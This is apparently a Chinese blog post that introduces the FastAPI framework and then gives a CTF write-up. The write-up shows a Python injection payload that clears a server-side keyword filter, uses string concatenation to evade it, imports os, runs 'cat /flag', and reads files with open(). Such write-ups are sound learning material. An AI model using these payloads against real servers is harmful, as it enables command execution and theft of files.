本文共 1090 字，大约阅读时间需要 3 分钟。

了解fastapi

fastapi的官方文档：

根据官方文档所说，fastapi是一个web框架，感觉和flask差不多

然后下载fastapi试试：

pip install fastapipip install uvicorn

安装好之后把文档里的示例代码运行一下

main.py

uvicorn main:app --reload

测试一下路由/items/{item_id}，访问http://127.0.0.1:8000/items/5?q=somequery

@app.get("/items/{item_id}")def read_item(item_id: int, q: str = None):    return {   "item_id": item_id, "q": q}

item_id: int, q: str = None的作用是定义数据类型为int和str，并且给q赋初值None，不传q果然为空

fastapi还有个交互式API，地址为/docs和/redoc，可以通过它来选择要调试的api，并传递参数给api实时查看结果，也就是说有了这个界面我们就知道参数有哪些，否则光一个api界面我们也不知道参数，因此这个功能只能用于调试。

题解

进入题目是一个fastapi，然后访问/docs或/redoc访问交互式界面

有三个路由，根据题目意思应该选择中间那个

通过这个界面我们知道它需要传递一个参数q进去

因为是基于python的，所以试试ssti，测试发现存在ssti

然后注入，怎么注入都不行，后面的操作就有点看不懂了，看了题解才知道有过滤，先查看当前的全局变量

list(calc.__globals__)

查看其中的 youdontknow

youdontknow

好家伙，过滤了class，然后要用clear()把这个变量清空

youdontknow.clear()

然后就是正常的ssti了

q=str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']("os").__dict__['pop'+'en']("cat /flag").read())

还可以通过open函数直接读取

open("/flag").read()